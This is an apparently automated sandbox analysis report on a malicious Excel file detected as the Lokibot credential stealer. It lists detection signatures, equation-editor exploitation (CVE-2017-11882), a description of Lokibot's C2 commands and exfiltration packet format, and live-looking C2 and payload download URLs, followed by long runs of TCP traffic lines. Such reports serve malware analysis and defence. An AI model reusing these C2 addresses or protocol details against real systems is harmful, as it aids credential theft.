Windows Analysis Report
MV_TRANS-ASIA_I.xls

Overview

General Information

Sample Name: MV_TRANS-ASIA_I.xls
Analysis ID: 1274208
MD5: 0c13eceb36bdde5263a3e2ecc3339407
SHA1: 19d9f3512d1d0e0ec66fe8fec4efd149f4287e1f
SHA256: fffb8dde88ae23cc6c9b00e3692bfe33242ebfde732dc0b0f4a445b729985fc5
Tags: xls
Infos:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Detected unpacking (overwrites its own PE header)
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Yara detected aPLib compressed binary
Tries to steal Mail credentials (via file registry)
Shellcode detected
Excel sheet contains many unusual embedded objects
Office equation editor drops PE file
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches the installation path of Mozilla Firefox
Enables debug privileges
Office Equation Editor has been started
Contains functionality to download and launch executables
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Loki Password Stealer (PWS), LokiBot "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

barindex
Source: http://185.252.179.165/Desktop/dwmfs.exe$ Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exetC: Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exeC: Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exej Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exe Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exeU Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exeT Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exejjC: Avira URL Cloud: Label: malware
Source: http://171.22.30.147/mous/five/fre.php Avira URL Cloud: Label: malware
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source: MV_TRANS-ASIA_I.xls ReversingLabs: Detection: 26%
Source: MV_TRANS-ASIA_I.xls Virustotal: Detection: 42% Perma Link
Source: MV_TRANS-ASIA_I.xls Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe Joe Sandbox ML: detected

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 185.252.179.165 Port: 80 Jump to behavior
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

barindex
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Unpacked PE file: 5.2.IBM_Centosie.exe.400000.1.unpack
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: [C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, 00000005.00000000.1068812593.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: Binary string: C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74

Software Vulnerabilities

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640533 ShellExecuteW,ExitProcess, 2_2_03640533
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640488 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036404A2 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036404A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0364040A URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_0364040A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036403D5 ExitProcess, 2_2_036403D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0364051E ShellExecuteW,ExitProcess, 2_2_0364051E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640558 ExitProcess, 2_2_03640558
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590488 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_03590488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_03590505
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590533 ShellExecuteW,ExitProcess, 12_2_03590533
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590558 ExitProcess, 12_2_03590558
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_0359051E ShellExecuteW,ExitProcess, 12_2_0359051E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_035903D5 ExitProcess, 12_2_035903D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_0359040A URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_0359040A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_035904A2 URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_035904A2
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
